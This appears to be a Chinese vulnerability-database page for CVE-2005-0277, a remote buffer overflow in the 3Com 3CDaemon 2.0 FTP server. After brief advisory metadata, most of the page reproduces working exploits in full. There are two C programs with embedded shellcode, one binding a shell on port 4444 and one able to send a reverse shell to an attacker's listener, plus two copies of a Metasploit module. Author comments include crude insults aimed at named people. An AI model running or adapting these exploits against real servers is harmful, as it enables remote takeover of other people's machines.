CVE-2005-0277
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:09:27
NMCOEP    

[原文]Buffer overflow in the FTP service in 3Com 3CDaemon 2.0 revision 10 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via (1) a long username in the USER command or (2) an FTP command that contains a long argument, such as cd, send, or ls.


[CNNVD]3Com 3CDaemon多个远程安全漏洞(CNNVD-200505-486)

        3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序。
        3CDaemon存在多个安全问题,远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0277
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0277
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-486
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110485674622696&w=2
(UNKNOWN)  BUGTRAQ  20050104 3Com 3CDaemon Multiple Vulnerabilities
http://marc.info/?l=bugtraq&m=110886719528518&w=2
(UNKNOWN)  BUGTRAQ  20050218 3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow
http://www.securityfocus.com/bid/12155
(UNKNOWN)  BID  12155
http://xforce.iss.net/xforce/xfdb/18754
(UNKNOWN)  XF  3cdaemon-long-command-dos(18754)

- 漏洞信息

3Com 3CDaemon多个远程安全漏洞
中危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序。
        3CDaemon存在多个安全问题,远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://support.3com.com/software/utilities_for_windows_32_bit.htm

- 漏洞信息 (825)

3Com Ftp Server 2.0 Remote Overflow Exploit (EDBID:825)
windows remote
2005-02-17 Verified
21 c0d3r
N/A [点击下载]
/* Email fixed brotha /str0ke */
/*
     3Com Ftp Server remote overflow exploit
     author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com
  package : 3CDaemon version 2.0 revision 10
  advisory : http://secway.org/advisory/ad20041011.txt
  company address : 3com.com
  it is just a simple PoC tested on winxp sp 1 and may not work on other systems .
  just a lame coded software that didnt cost to bother myself to develop
  the exploit code . every command has got overflow .
  compiled with visual c++ 6 : cl 3com.c
  greetz : LorD and NT of Iran Hackers Sabotages , irc.zirc.org #ihs
  Jamie of exploitdev (hey man how should I thank u with ur helps?),
  sIiiS and vbehzadan of hyper-security , pishi , redhat , araz , simorgh
  securiteam , roberto of zone-h , milw0rm (dont u see that my mail address has changed?)
  Lamerz :
  shervin_kesafat@yahoo.com with a fucked ass ! , konkoor ( will be dead soon !! )
  ashiyane digital lamerz team ( abroo har chi iranie bordin khak barsara ! )

/*
/*
D:\projects>3com.exe 127.0.0.1 21 c0d3r secret

-------- 3Com Ftp Server remote exploit by c0d3r --------

[*] building overflow string
[*] attacking host 127.0.0.1
[*] packet size = 673 byte
[*] connected
[*] sending username
[*] sending password
[*] exploit sent successfully try nc 127.0.0.1 4444

D:\projects>nc 127.0.0.1 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\3Com\3CDaemon>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box
#define size 673 // 3 byte command + 235 byte NOP junk +
                           // 4 byte return address + 430 byte shellc0de

 int main (int argc, char *argv[]){

 char shellc0de[] = // some NOPS + shellcode bind port 4444

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x10\x5A\x4A\x33\xC9\x66"
"\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
  
  unsigned char *recvbuf,*user,*pass;
  unsigned int rc,addr,sock,rc2 ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  unsigned short port;
  char *ptr;
  long *addr_ptr;
  int NOP_LEN = 200,i,x=0,f = 200;
  if(argc < 5) {
      printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n");
   printf("-------- usage : 3com.exe host port user pass --------\n");
   printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------\n\n");
  exit(-1) ;
  }
  printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n\n");
  recvbuf = malloc(256);
  memset(recvbuf,0,256);
  
  //Creating exploit code
  printf("[*] building overflow string");
    memset(buffer,0,size);
       ptr = buffer;
       addr_ptr = (long *) ptr;
 
     for(i=0;i < size;i+=4){
   *(addr_ptr++) = address;
  }
   buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';
   for(i = 3;i != 235;i++){
   buffer[i] = 0x90;
  }
     i = 239;
  for(x = 0;x != strlen(shellc0de);x++,i++){
   buffer[i] = shellc0de[x];
  }
  buffer[size] = 0;
 
  //EO exploit code

  user = malloc(256);
  memset(user,0,256);

  pass = malloc(256);
  memset(pass,0,256);

  sprintf(user,"user %s\r\n",argv[3]);
  sprintf(pass,"pass %s\r\n",argv[4]);
  
   if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !\n");
   exit(-1);
  }
 hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("[-] socket() error...\n");
   exit(-1);
  }
   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("\n[*] attacking host %s\n" , argv[1]) ;
  
  Sleep(1000);
  
  printf("[*] packet size = %d byte\n" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
  printf("[*] connected\n") ;
     rc2=recv(sock,recvbuf,256,0);
     printf("[*] sending username\n");
     send(sock,user,strlen(user),0);
     send(sock,'\n',1,0);
     printf("[*] sending password\n");
     Sleep(1000);
  send(sock,pass,strlen(pass),0);
     send(sock,buffer,strlen(buffer),0);
  send(sock,'\n',1,0);
     printf("[*] exploit sent successfully try nc %s 4444\n" , argv[1]);
  }
  
  else {
      printf("[-] 3CDaemon is not listening .... \n");
 }
  shutdown(sock,1);
  closesocket(sock);
  

}

// milw0rm.com [2005-02-17]
		

- 漏洞信息 (827)

3Com 3CDaemon FTP Unauthorized "USER" Remote BoF Exploit (EDBID:827)
windows remote
2005-02-18 Verified
21 class101
N/A [点击下载]
/* Added " on line 86 /str0ke */

/*
3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow
 
The particularity of this exploit is to exploits a FTP server
without the need of any authorization.
 
Homepage: www.3com.com
version: 3CDaemon v2.0 rev10
Link: ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip
 
Application Risk: Severely High
Internet Risk: Low
 
Hole History:
 
  14-4-2002: BOF flaw found by skyrim
  15-4-2002: crash exploit done. securiteam.com/exploits/5NP050A75A.html
  04-1-2005: Updated advisory by Sowhat securitytracker.com/id?1012768
  17-2-2005: lame exploit released milw0rm.com/id.php?id=825
  18-2-2005: proper exploit released hat-squad.com, class101.org, class101.hat-squad.com
 
Notes:
 
  -4 bad bytes, 0x00, 0x25, 0x0D, 0x0A, badly interpreted by 3CDaemon
  -Nice call ebx offset found.
   Stable accross Win2k Pro&Srv, SP4's serie, every OS languages.
 
Greet: 
  
  Nima Majidi
        Behrang Fouladi
  Pejman
  Hat-Squad.com
  class101.org
  class101.hat-squad.com
 
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
 
 
 
char scode1[]=
/*XORED*/
"\xEB\x26\x90\x00\x00\x00\x00\x00\x00\x02\x06\x6C\x59\x6C\x59"
"\xF8\x1D\x9C\xDE\x8C\xD1\x4C\x70\xD4\x03\x58\x46\x57\x53\x32"
"\x5F\x33\x32\x2E\x44\x4C\x4C\x01\xEB\x05\xE8\xF9\xFF\xFF\xFF"
"\x5D\x83\xED\x2C\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C\x8B\x70"
"\x1C\xAD\x8B\x78\x08\x8D\x5F\x3C\x8B\x1B\x01\xFB\x8B\x5B\x78"
"\x01\xFB\x8B\x4B\x1C\x01\xF9\x8B\x53\x24\x01\xFA\x53\x51\x52"
"\x8B\x5B\x20\x01\xFB\x31\xC9\x41\x31\xC0\x99\x8B\x34\x8B\x01"
"\xFE\xAC\x31\xC2\xD1\xE2\x84\xC0\x75\xF7\x0F\xB6\x45\x09\x8D"
"\x44\x45\x08\x66\x39\x10\x75\xE1\x66\x31\x10\x5A\x58\x5E\x56"
"\x50\x52\x2B\x4E\x10\x41\x0F\xB7\x0C\x4A\x8B\x04\x88\x01\xF8"
"\x0F\xB6\x4D\x09\x89\x44\x8D\xD8\xFE\x4D\x09\x75\xBE\xFE\x4D"
"\x08\x74\x17\xFE\x4D\x24\x8D\x5D\x1A\x53\xFF\xD0\x89\xC7\x6A"
"\x02\x58\x88\x45\x09\x80\x45\x79\x0C\xEB\x82\x50\x8B\x45\x04"
"\x35\x93\x93\x93\x93\x89\x45\x04\x66\x8B\x45\x02\x66\x35\x93"
"\x93\x66\x89\x45\x02\x58\x89\xCE\x31\xDB\x53\x53\x53\x53\x56"
"\x46\x56\xFF\xD0\x89\xC7\x55\x58\x66\x89\x30\x6A\x10\x55\x57"
"\xFF\x55\xE0\x8D\x45\x88\x50\xFF\x55\xE8\x55\x55\xFF\x55\xEC"
"\x8D\x44\x05\x0C\x94\x53\x68\x2E\x65\x78\x65\x68\x5C\x63\x6D"
"\x64\x94\x31\xD2\x8D\x45\xCC\x94\x57\x57\x57\x53\x53\xFE\xCA"
"\x01\xF2\x52\x94\x8D\x45\x78\x50\x8D\x45\x88\x50\xB1\x08\x53"
"\x53\x6A\x10\xFE\xCE\x52\x53\x53\x53\x55\xFF\x55\xF0\x6A\xFF"
"\xFF\x55\xE4";
 
char scode2[]=
/*XORED*/
"\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x5E\x81\x73\x17\x0E\xB4"
"\x9F\x23\x83\xEB\xFC\xE2\xF4\xF2\x5C\xC9\x23\x0E\xB4\xCC\x76\x58"
"\xE3\x14\x4F\x2A\xAC\x14\x66\x32\x3F\xCB\x26\x76\xB5\x75\xA8\x44"
"\xAC\x14\x79\x2E\xB5\x74\xC0\x3C\xFD\x14\x17\x85\xB5\x71\x12\xF1"
"\x48\xAE\xE3\xA2\x8C\x7F\x57\x09\x75\x50\x2E\x0F\x73\x74\xD1\x35"
"\xC8\xBB\x37\x7B\x55\x14\x79\x2A\xB5\x74\x45\x85\xB8\xD4\xA8\x54"
"\xA8\x9E\xC8\x85\xB0\x14\x22\xE6\x5F\x9D\x12\xCE\xEB\xC1\x7E\x55"
"\x76\x97\x23\x50\xDE\xAF\x7A\x6A\x3F\x86\xA8\x55\xB8\x14\x78\x12"
"\x3F\x84\xA8\x55\xBC\xCC\x4B\x80\xFA\x91\xCF\xF1\x62\x16\xE4\x8F"
"\x58\x9F\x22\x0E\xB4\xC8\x75\x5D\x3D\x7A\xCB\x29\xB4\x9F\x23\x9E"
"\xB5\x9F\x23\xB8\xAD\x87\xC4\xAA\xAD\xEF\xCA\xEB\xFD\x19\x6A\xAA"
"\xAE\xEF\xE4\xAA\x19\xB1\xCA\xD7\xBD\x6A\x8E\xC5\x59\x63\x18\x59"
"\xE7\xAD\x7C\x3D\x86\x9F\x78\x83\xFF\xBF\x72\xF1\x63\x16\xFC\x87"
"\x77\x12\x56\x1A\xDE\x98\x7A\x5F\xE7\x60\x17\x81\x4B\xCA\x27\x57"
"\x3D\x9B\xAD\xEC\x46\xB4\x04\x5A\x4B\xA8\xDC\x5B\x84\xAE\xE3\x5E"
"\xE4\xCF\x73\x4E\xE4\xDF\x73\xF1\xE1\xB3\xAA\xC9\x85\x44\x70\x5D"
"\xDC\x9D\x23\x0E\xD1\x16\xC3\x64\xA4\xCF\x74\xF1\xE1\xBB\x70\x59"
"\x4B\xCA\x0B\x5D\xE0\xC8\xDC\x5B\x94\x16\xE4\x66\xF7\xD2\x67\x0E"
"\x3D\x7C\xA4\xF4\x85\x5F\xAE\x72\x90\x33\x49\x1B\xED\x6C\x88\x89"
"\x4E\x1C\xCF\x5A\x72\xDB\x07\x1E\xF0\xF9\xE4\x4A\x90\xA3\x22\x0F"
"\x3D\xE3\x07\x46\x3D\xE3\x07\x42\x3D\xE3\x07\x5E\x39\xDB\x07\x1E"
"\xE0\xCF\x72\x5F\xE5\xDE\x72\x47\xE5\xCE\x70\x5F\x4B\xEA\x23\x66"
"\xC6\x61\x90\x18\x4B\xCA\x27\xF1\x64\x16\xC5\xF1\xC1\x9F\x4B\xA3"
"\x6D\x9A\xED\xF1\xE1\x9B\xAA\xCD\xDE\x60\xDC\x38\x4B\x4C\xDC\x7B"
"\xB4\xF7\xD3\x84\xB0\xC0\xDC\x5B\xB0\xAE\xF8\x5D\x4B\x4F\x23";
 
char payload[1024];
 
char ebx[]="\x08\xB0\x01\x78";
char ebx2[]="\xB1\x2C\xC2\x77";
char pad[]="\xEB\x0C\x90\x90";
char EOL[]="\x0D\x0A";
 
#ifdef WIN32
 WSADATA wsadata;
#endif
 
void ver();
void usage(char* us);
 
int main(int argc,char *argv[])
{
 ver();
 unsigned long gip;
 unsigned short gport;
 char *target, *os;
 if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
 if (argc==5){usage(argv[0]);return -1;}
    if (strlen(argv[2])<7){usage(argv[0]);return -1;}
    if (argc==6)
 {
        if (strlen(argv[4])<7){usage(argv[0]);return -1;}
 }
#ifndef WIN32
 if (argc==6)
 {
   gip=inet_addr(argv[4])^(long)0x93939393;
  gport=htons(atoi(argv[5]))^(short)0x9393;
 }
#define Sleep  sleep
#define SOCKET  int
#define closesocket(s) close(s)
#else
 if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
 if (argc==6)
 {
  gip=inet_addr(argv[4])^(ULONG)0x93939393;
  gport=htons(atoi(argv[5]))^(USHORT)0x9393;
 }
#endif
 int ip=htonl(inet_addr(argv[2])), port;
 if (argc==4||argc==6){port=atoi(argv[3]);} else port=21;
 SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
 s=socket(AF_INET,SOCK_STREAM,0);
 if (s==-1){printf("[+] socket() error\n");return -1;}
 if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+]            Win2k SP4 Pro.   English\n[+]            Win2k SP4 Pro.   Norsk\n[+]            Win2k SP4 Server German\n[+]            Win2k SP4 Pro.   Dutch\n[+]            Etc...";}
 if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2  Pro. English\n[+]            WinXP SP1a Pro. English\n[+]            WinXP SP1  Pro. English";}
 printf("[+] target(s): %s\n",os);
 server.sin_family=AF_INET;
 server.sin_addr.s_addr=htonl(ip);
 server.sin_port=htons(port);
 connect(s,( struct sockaddr *)&server,sizeof(server));
 timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 switch(select(s+1,NULL,&mask,NULL,&timeout))
 {
  case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
  case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
  default:
  if(FD_ISSET(s,&mask))
  {
   printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
   Sleep(1000);
#else
   Sleep(1);
#endif
   strcpy(payload,"USER ");
   memset(payload+5,0x90,700);
   memcpy(payload+5+229,&pad,4);
   memcpy(payload+238,target,4);
   if (argc==6)
   {
    memcpy(&scode1[5], &gip, 4);
    memcpy(&scode1[3], &gport, 2);
    memcpy(payload+253,scode1,sizeof(scode1));
   }
   else memcpy(payload+253,scode2,sizeof(scode2));
   strcat(payload,EOL);
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
   Sleep(2000);
#else
   Sleep(2);
#endif
 
   printf("[+] size of payload: %d\n",strlen(payload));
   printf("[+] payload sent.\n");
   return 0;
  }
 }
 closesocket(s);
#ifdef WIN32
 WSACleanup();
#endif
 return 0;
}
 

void usage(char* us)
{
 printf("USAGE:\n");
 printf("      [+]  . 101_3com.exe Target VulnIP (bind mode)\n");
 printf("      [+]  . 101_3com.exe Target VulnIP VulnPORT (bind mode)\n");
 printf("      [+]  . 101_3com.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
 printf("TARGET:                               \n");
 printf("      [+] 1. Win2k SP4  Server English (*)\n");
 printf("      [+] 1. Win2k SP4  Pro    English (*)\n");
 printf("      [+] 1. Win2k SP4  Server German  (*)\n");
 printf("      [+] 1. Win2k SP4  Pro    China   (*)\n");
 printf("      [+] 1. Win2k SP4  Pro    Dutch   (*)\n");
 printf("      [+] 1. Win2k SP4  Pro    Norsk   (*)\n");
 printf("      [+] 2. WinXP SP2  Pro.   English    \n");
 printf("      [+] 2. WinXP SP1a Pro.   English (*)\n");
 printf("      [+] 2. WinXP SP1  Pro.   English    \n");
 printf("NOTE:                               \n");
 printf("      The exploit bind a cmdshell port 101 or\n");
 printf("      reverse a cmdshell on your listener.\n");
 printf("      A wildcard (*) mean tested working, else, supposed working.\n");
 printf("      Compilation msvc6, cygwin, Linux.\n");
 return;
}
void ver()
{
 printf("                                                                   \n");
 printf("        ===================================================[0.1]=====\n");
 printf("        ================3COM 3CDaemon v2.0 Revision 10===============\n");
 printf("        ==============FTP Service, Remote Stack Overflow=============\n");
 printf("        ======coded by class101=============[Hat-Squad.com 2005]=====\n");
 printf("        =============================================================\n");
 printf("                                                                   \n");
}

// milw0rm.com [2005-02-18]
		

- 漏洞信息 (16730)

3Com 3CDaemon 2.0 FTP Username Overflow (EDBID:16730)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: 3cdaemon_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '3Com 3CDaemon 2.0 FTP Username Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the 3Com 3CDaemon
				FTP service. This package is being distributed from the 3Com
				web site and is recommended in numerous support documents.
				This module uses the USER command to trigger the overflow.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2005-0277'],
					[ 'OSVDB', '12810'],
					[ 'OSVDB', '12811'],
					[ 'BID', '12155'],
					[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 674,
					'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Targets'        =>
				[
					[
						'Windows 2000 English', # Tested OK - hdm 11/24/2005
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4, # ws2help.dll
						},
					],
					[
						'Windows XP English SP0/SP1',
						{
							'Platform' => 'win',
							'Ret'      => 0x71aa32ad, # ws2help.dll
						},
					],
					[
						'Windows NT 4.0 SP4/SP5/SP6',
						{
							'Platform' => 'win',
							'Ret'      => 0x77681799, # ws2help.dll
						},
					],
					[
						'Windows 2000 Pro SP4 French',
						{
							'Platform' => 'win',
							'Ret' => 0x775F29D0,
						},
					],

				],
			'DisclosureDate' => 'Jan 4 2005'))
	end

	def check
		connect
		disconnect
		if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(2048, payload_badchars)
		seh          = generate_seh_payload(target.ret)
		buf[229, seh.length] = seh

		send_cmd( ['USER', buf] , false )

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83100)

3Com 3CDaemon 2.0 FTP Username Overflow (PacketStormID:F83100)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,web,overflow
CVE-2005-0277
[点击下载]

This Metasploit module exploits a vulnerability in the 3Com 3CDaemon FTP service. This package is being distributed from the 3Com web site and is recommended in numerous support documents. This Metasploit module uses the USER command to trigger the overflow.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => '3Com 3CDaemon 2.0 FTP Username Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the 3Com 3CDaemon
				FTP service. This package is being distributed from the 3Com
				web site and is recommended in numerous support documents.
				This module uses the USER command to trigger the overflow.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0277'],
					[ 'OSVDB', '12810'],
					[ 'OSVDB', '12811'],
					[ 'BID', '12155'],
					[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 674,
					'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}

				},
			'Targets'        => 
				[
					[ 
						'Windows 2000 English', # Tested OK - hdm 11/24/2005
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4, # ws2help.dll
						},
					],
					[
						'Windows XP English SP0/SP1',
						{
							'Platform' => 'win',
							'Ret'      => 0x71aa32ad, # ws2help.dll
						},
					],
					[
						'Windows NT 4.0 SP4/SP5/SP6',
						{
							'Platform' => 'win',
							'Ret'      => 0x77681799, # ws2help.dll
						},												
					],
					[ 
					  'Windows 2000 Pro SP4 French',  
					  {
					    'Platform' => 'win',
					    'Ret' => 0x775F29D0,
					  }, 
					],
					
				],
			'DisclosureDate' => 'Jan 4 2005'))
	end

	def check
		connect
		disconnect	
		if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
			return Exploit::CheckCode::Vulnerable
		end		
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(2048, payload_badchars)
		seh          = generate_seh_payload(target.ret) 
		buf[229, seh.length] = seh

		send_cmd( ['USER', buf] , false )
		
		handler
		disconnect
	end

end
    

- 漏洞信息

12810
3Com 3CDaemon FTP Username Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

A remote overflow exists in 3CDaemon. The FTP application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long username, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-01-04 Unknow
2005-01-04 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站